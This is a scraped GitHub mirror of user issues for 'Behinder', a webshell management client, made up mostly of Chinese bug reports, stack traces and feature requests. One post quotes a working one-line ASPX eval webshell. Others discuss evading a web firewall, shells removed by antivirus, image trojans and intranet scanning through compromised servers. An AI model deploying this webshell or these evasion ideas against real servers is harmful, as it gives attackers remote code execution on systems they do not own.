rebeyond / behinder Goto Github PK
View Code? Open in Web Editor NEW“冰蝎”动态二进制加密网站管理客户端
“冰蝎”动态二进制加密网站管理客户端
Hippor小菜刀 https://github.com/xsgam/Hippoer
为了学习和研究技术而写了这个小工具,借鉴(COPY)了冰蝎的很多代码和思路。
版本2.01,aspx 基本信息处 JSONObject["headers"] not found. 然后点击文件管理就会退出,
在1.2.1版本就能正常获取到基本信息。
java环境
java version "1.8.0_221"
Java(TM) SE Runtime Environment (build 1.8.0_221-b11)
Java HotSpot(TM) 64-Bit Server VM (build 25.221-b11, mixed mode)
Oracle
官网上下载的JDK
版本是jdk-8u221-linux-x64.tar.gz
本来是自带的openJDK 11,无法打开冰蝎。看到你在其他的帖子上写过支持java 8,所以就替换了版本。双击jar
包打不开,使用命令行成功打开。
java -jar Behinder.jar
但是报错了
(SWT:40520): GLib-CRITICAL **: 15:02:57.533: g_base64_encode_step: assertion 'in != NULL' failed
(SWT:40520): GLib-CRITICAL **: 15:02:57.533: g_base64_encode_step: assertion 'in != NULL' failed
(SWT:40520): GLib-CRITICAL **: 15:02:57.533: g_base64_encode_step: assertion 'in != NULL' failed
(SWT:40520): GLib-CRITICAL **: 15:02:57.533: g_base64_encode_step: assertion 'in != NULL' failed
尝试链接PHP马,有报错,但是能正常显示操作界面。
SWT Webkit.java Error: Could not find webkit extension. BrowserFunction functionality will not be available.
(swt version: 4880) SWT Glue code version: 54.0 info: +BrowserFunction/GDBus, +WebkitExtension Folder versioning, +WebKitExtension OSGI support, +setUrl(..postData..), -setCookie(), -getCookie +mouseDown/Focus
WebKit2Gtk version 2.24.3
Please report this issue *with steps to reproduce* via:
https://bugs.eclipse.org/bugs/enter_bug.cgi?alias=&assigned_to=platform-swt-inbox%40eclipse.org&attach_text=&blocked=&bug_file_loc=http%3A%2F%2F&bug_severity=normal&bug_status=NEW&comment=&component=SWT&contenttypeentry=&contenttypemethod=autodetect&contenttypeselection=text%2Fplain&data=&defined_groups=1&dependson=&description=&flag_type-1=X&flag_type-11=X&flag_type-12=X&flag_type-13=X&flag_type-14=X&flag_type-15=X&flag_type-16=X&flag_type-2=X&flag_type-4=X&flag_type-6=X&flag_type-7=X&flag_type-8=X&form_name=enter_bug&keywords=&maketemplate=Remember%20values%20as%20bookmarkable%20template&op_sys=Linux&product=Platform&qa_contact=&rep_platform=PC&requestee_type-1=&requestee_type-2=&short_desc=webkit2_BrowserProblem
For bug report, please atatch this stack trace:
java.lang.Throwable:
at org.eclipse.swt.browser.WebKit.getStackTrace(WebKit.java:437)
at org.eclipse.swt.browser.WebKit.getInternalErrorMsg(WebKit.java:430)
at org.eclipse.swt.browser.WebKit.access$200(WebKit.java:123)
at org.eclipse.swt.browser.WebKit$Webkit2Extension.initializeWebExtensions_callback(WebKit.java:532)
at org.eclipse.swt.internal.webkit.WebKitGTK._webkit_web_view_new(Native Method)
at org.eclipse.swt.internal.webkit.WebKitGTK.webkit_web_view_new(WebKitGTK.java:1878)
at org.eclipse.swt.browser.WebKit.create(WebKit.java:1079)
at org.eclipse.swt.browser.Browser.<init>(Browser.java:99)
at net.rebeyond.behinder.ui.MainShell.<init>(MainShell.java:164)
at net.rebeyond.behinder.ui.Main.openShellWindow(Main.java:160)
at net.rebeyond.behinder.ui.Main.access$2(Main.java:157)
at net.rebeyond.behinder.ui.Main$3.mouseDoubleClick(Main.java:316)
at org.eclipse.swt.widgets.TypedListener.handleEvent(TypedListener.java:197)
at org.eclipse.swt.widgets.EventTable.sendEvent(EventTable.java:86)
at org.eclipse.swt.widgets.Display.sendEvent(Display.java:5686)
at org.eclipse.swt.widgets.Widget.sendEvent(Widget.java:1370)
at org.eclipse.swt.widgets.Display.runDeferredEvents(Display.java:4940)
at org.eclipse.swt.widgets.Display.readAndDispatch(Display.java:4518)
at net.rebeyond.behinder.ui.Main.open(Main.java:151)
at net.rebeyond.behinder.ui.Main.start(Main.java:76)
at net.rebeyond.behinder.ui.Starter.main(Starter.java:28)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.eclipse.jdt.internal.jarinjarloader.JarRsrcLoader.main(JarRsrcLoader.java:58)
似乎在一篇issue
看过说是webkit
没装。
不过这里说的是webkit extension没装。有点弄不明白了。
还希望大佬赐教。
apple@appledeMacBook-Pro bexie % java -XstartOnFirstThread -jar ./Behinder.jar
java.lang.ClassCastException: class jdk.internal.loader.ClassLoaders$AppClassLoader cannot be cast to class java.net.URLClassLoader (jdk.internal.loader.ClassLoaders$AppClassLoader and java.net.URLClassLoader are in module java.base of loader 'bootstrap')
at net.rebeyond.behinder.ui.Starter.addJarToClasspath(Starter.java:87)
at net.rebeyond.behinder.ui.Starter.main(Starter.java:26)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:567)
at org.eclipse.jdt.internal.jarinjarloader.JarRsrcLoader.main(JarRsrcLoader.java:58)
Exception in thread "main" java.lang.reflect.InvocationTargetException
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:567)
at org.eclipse.jdt.internal.jarinjarloader.JarRsrcLoader.main(JarRsrcLoader.java:58)
Caused by: java.lang.NoClassDefFoundError: org/eclipse/swt/graphics/Device
at net.rebeyond.behinder.ui.Starter.main(Starter.java:27)
... 5 more
Caused by: java.lang.ClassNotFoundException: org.eclipse.swt.graphics.Device
at java.base/java.net.URLClassLoader.findClass(URLClassLoader.java:436)
at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:588)
at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:521)
... 6 more
✘ a403@A403deMacBook-Pro /Volumes/C/Users/a403/Downloads/Behinder_v2.0.1 java -version
java version "1.8.0_221"
Java(TM) SE Runtime Environment (build 1.8.0_221-b11)
Java HotSpot(TM) 64-Bit Server VM (build 25.221-b11, mixed mode)
a403@A403deMacBook-Pro /Volumes/C/Users/a403/Downloads/Behinder_v2.0.1 java -jar Behinder.jar
***WARNING: Display must be created on main thread due to Cocoa restrictions.
org.eclipse.swt.SWTException: Invalid thread access
at org.eclipse.swt.SWT.error(Unknown Source)
at org.eclipse.swt.SWT.error(Unknown Source)
at org.eclipse.swt.SWT.error(Unknown Source)
at org.eclipse.swt.widgets.Display.error(Unknown Source)
at org.eclipse.swt.widgets.Display.createDisplay(Unknown Source)
at org.eclipse.swt.widgets.Display.create(Unknown Source)
at org.eclipse.swt.graphics.Device.(Unknown Source)
at org.eclipse.swt.widgets.Display.(Unknown Source)
at org.eclipse.swt.widgets.Display.(Unknown Source)
at org.eclipse.swt.widgets.Display.getDefault(Unknown Source)
at net.rebeyond.behinder.ui.Main.open(Main.java:133)
at net.rebeyond.behinder.ui.Main.start(Main.java:76)
at net.rebeyond.behinder.ui.Starter.main(Starter.java:28)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.eclipse.jdt.internal.jarinjarloader.JarRsrcLoader.main(JarRsrcLoader.java:58)
开启虚拟终端的时候显示一下pid,方便不用的时候结束,不然每次启动都会在进程多一个pid,容易结束错
最简单的<%@ Page Language="Jscript"%><%eval(Request.Item["p"],"unsafe");%>可以执行,但是用提供的shell code出现Runtime Error
1、文件管理如果以 目录在上 文件在下 的排序的话感觉更符合日常操作习惯;
2、文件管理里双击打开文件的操作会比右键打开文件的操作使用起来更舒服一些;
3、编辑文件的 保存和返回 两个选项可以互换一下位置,有时候经常习惯性点错。。。
java version "1.8.0_171"
Tomcat9,使用https://xz.aliyun.com/t/2744中的jsp,测试时会报找不到javax.servlet.jsp.PageContext类。这是什么原因??
当在shell.jsp内容后面加个回车换行。连接出错。去掉换行,连接没有问题,能修复下吗。
如题,目前已被安全狗拦截,执行whoami等命令时,程序会进入假死状态,最终只能未响应退出程序。望修复~
当开启 display_error 时,在回显的加密数据里面会有一些 warning 信息,这样会导致客户端没法提取出数据
贴一下报错代码:
***WARNING: Display must be created on main thread due to Cocoa restrictions.
org.eclipse.swt.SWTException: Invalid thread access
at org.eclipse.swt.SWT.error(Unknown Source)
at org.eclipse.swt.SWT.error(Unknown Source)
at org.eclipse.swt.SWT.error(Unknown Source)
at org.eclipse.swt.widgets.Display.error(Unknown Source)
at org.eclipse.swt.widgets.Display.createDisplay(Unknown Source)
at org.eclipse.swt.widgets.Display.create(Unknown Source)
at org.eclipse.swt.graphics.Device.<init>(Unknown Source)
at org.eclipse.swt.widgets.Display.<init>(Unknown Source)
at org.eclipse.swt.widgets.Display.<init>(Unknown Source)
at org.eclipse.swt.widgets.Display.getDefault(Unknown Source)
at net.rebeyond.behinder.ui.Main.open(Main.java:106)
at net.rebeyond.behinder.ui.Main.start(Main.java:70)
at net.rebeyond.behinder.ui.Starter.main(Starter.java:28)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.eclipse.jdt.internal.jarinjarloader.JarRsrcLoader.main(JarRsrcLoader.java:58)
密码字段直接放在GET 会被记录日志
数据库管理 如果连接串中有# 号 会连接失败
不能ctrl C V
从数据库表中读取出来的值无法复制也无法编辑~
我反编译了代码,发现缺了utils缺少了几个库的支持,无法编译通过
iis6.0 net 2.0环境下 基本信息获取不到,显示基本信息获取失败《html》
可否增加一个文件夹压缩功能
比如说我想下载整个文件夹里面的内容,目前只能点进去一个一个下载,如果有了文件夹压缩功能,就可以先把文件夹压缩,然后 直接下载压缩包就可以了。
数据库连接问题,当数据库密码存在@就会连接不上
脚本类型:aspx
OS类型:Windows
文件管理中文路径乱码导致路径无法正常读取
冰蝎没有开源?
php版本:5.4.45
冰蝎使用的版本为2.0.1
同样的用菜刀能连接,冰蝎不能连接
连接字符串:
mysql://root:[email protected]:3306/mysql
因为密码后面用@接ip的,如果密码中包含@字符,貌似就不行了
错误信息为:A JSONObject text must begin with '{' at 1 [character 2 line 1]
为何一直提示密钥获取失败,密码错误?
`(SWT:11543): Gtk-CRITICAL **: 02:38:06.677: gtk_box_gadget_distribute: assertion 'size >= 0' failed in GtkScrollbar
Exception in thread "main" java.lang.reflect.InvocationTargetException
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.eclipse.jdt.internal.jarinjarloader.JarRsrcLoader.main(JarRsrcLoader.java:58)
Caused by: org.eclipse.swt.SWTError: No more handles because no underlying browser available.
Please ensure Webkit with its Gtk 3.x bindings installed. Webkit2 API level preferred.
at org.eclipse.swt.SWT.error(SWT.java:4578)
at org.eclipse.swt.browser.Browser.<init>(Browser.java:125)
at net.rebeyond.behinder.ui.MainShell.<init>(MainShell.java:162)
at net.rebeyond.behinder.ui.Main.openShellWindow(Main.java:144)
at net.rebeyond.behinder.ui.Main.access$1(Main.java:141)
at net.rebeyond.behinder.ui.Main$2$3.handleEvent(Main.java:219)
at org.eclipse.swt.widgets.EventTable.sendEvent(EventTable.java:86)
at org.eclipse.swt.widgets.Display.sendEvent(Display.java:5686)
at org.eclipse.swt.widgets.Widget.sendEvent(Widget.java:1370)
at org.eclipse.swt.widgets.Display.runDeferredEvents(Display.java:4940)
at org.eclipse.swt.widgets.Display.readAndDispatch(Display.java:4518)
at net.rebeyond.behinder.ui.Main.open(Main.java:135)
at net.rebeyond.behinder.ui.Main.start(Main.java:81)
at net.rebeyond.behinder.ui.Starter.main(Starter.java:28)
... 5 more
`
大神KAIL下始终运行不了程序啊 kail最新64位自带的JDK不UPDATE 啥也不UPDATE 也运行不了程序,update后也不行
反馈两个问题 终端命令结果不能复制 命令执行的地方有时候执行程序会卡死 只能重新连接
如图所示:
底下和上面的白色问题
双击打开 shell 时,终端报错,不过仍可以正常操作功能
SWT Webkit.java Error: Could not find webkit extension. BrowserFunction functionality will not be available.
(swt version: 4880) SWT Glue code version: 54.0 info: +BrowserFunction/GDBus, +WebkitExtension Folder versioning, +WebKitExtension OSGI support, +setUrl(..postData..), -setCookie(), -getCookie +mouseDown/Focus
WebKit2Gtk version 2.20.2
Please report this issue *with steps to reproduce* via:
https://bugs.eclipse.org/bugs/enter_bug.cgi?alias=&assigned_to=platform-swt-inbox%40eclipse.org&attach_text=&blocked=&bug_file_loc=http%3A%2F%2F&bug_severity=normal&bug_status=NEW&comment=&component=SWT&contenttypeentry=&contenttypemethod=autodetect&contenttypeselection=text%2Fplain&data=&defined_groups=1&dependson=&description=&flag_type-1=X&flag_type-11=X&flag_type-12=X&flag_type-13=X&flag_type-14=X&flag_type-15=X&flag_type-16=X&flag_type-2=X&flag_type-4=X&flag_type-6=X&flag_type-7=X&flag_type-8=X&form_name=enter_bug&keywords=&maketemplate=Remember%20values%20as%20bookmarkable%20template&op_sys=Linux&product=Platform&qa_contact=&rep_platform=PC&requestee_type-1=&requestee_type-2=&short_desc=webkit2_BrowserProblem
For bug report, please atatch this stack trace:
java.lang.Throwable:
at org.eclipse.swt.browser.WebKit.getStackTrace(WebKit.java:437)
at org.eclipse.swt.browser.WebKit.getInternalErrorMsg(WebKit.java:430)
at org.eclipse.swt.browser.WebKit.access$200(WebKit.java:123)
at org.eclipse.swt.browser.WebKit$Webkit2Extension.initializeWebExtensions_callback(WebKit.java:532)
at org.eclipse.swt.internal.webkit.WebKitGTK._webkit_web_view_new(Native Method)
at org.eclipse.swt.internal.webkit.WebKitGTK.webkit_web_view_new(WebKitGTK.java:1878)
at org.eclipse.swt.browser.WebKit.create(WebKit.java:1079)
at org.eclipse.swt.browser.Browser.<init>(Browser.java:99)
at net.rebeyond.behinder.ui.MainShell.<init>(MainShell.java:160)
at net.rebeyond.behinder.ui.Main.openShellWindow(Main.java:133)
at net.rebeyond.behinder.ui.Main.access$1(Main.java:130)
at net.rebeyond.behinder.ui.Main$2$3.handleEvent(Main.java:205)
at org.eclipse.swt.widgets.EventTable.sendEvent(EventTable.java:86)
at org.eclipse.swt.widgets.Display.sendEvent(Display.java:5686)
at org.eclipse.swt.widgets.Widget.sendEvent(Widget.java:1370)
at org.eclipse.swt.widgets.Display.runDeferredEvents(Display.java:4940)
at org.eclipse.swt.widgets.Display.readAndDispatch(Display.java:4518)
at net.rebeyond.behinder.ui.Main.open(Main.java:124)
at net.rebeyond.behinder.ui.Main.start(Main.java:70)
at net.rebeyond.behinder.ui.Starter.main(Starter.java:28)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.eclipse.jdt.internal.jarinjarloader.JarRsrcLoader.main(JarRsrcLoader.java:58)
sock代理没成功,举例下:putty x.x.a.b 22 代理 127.0.0.1 10086
web server : 能看到 已经同 x.x.a.b port 22建立连接 但putty 这边没有任何反应
sql语句查询时候在双击数据库时可以将相应的sql语句显示在sql注入处
增加内网ip扫描功能,并将各个端口banner信息返回
能传上去,但是访问路径404,应该是被杀了,如何解决呢?
不能链接图片马,copy+xxx的图片
加一个测试连接吧
close
环境 windows , jspstudy,
jre 1.7 tomcat 6/ tomcat 8
客户端报错
Connection timed out: connect
操作环境:MacOs、java10.0 使用java -XstartOnFirstThread -jar Behinder.jar无法打开,报错信息如下:class jdk.internal.loader.ClassLoaders$AppClassLoader cannot be cast to class java.net.URLClassLoader
通过更改jdk版本,更改为1.8可成功打开。
建议在readme中说明该情况,或者提供高版本jdk可运行版本
1.上传上去的文件不能重命名。
2.文件夹和文件列表不能按时间排序。
3.最新版本不能兼容mac。
win+apache+php5.5.38下,刚开始命令执行和虚拟终端都失败了
后来把php的错误回显关闭,成功了
还有建议增加一个代理的功能
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.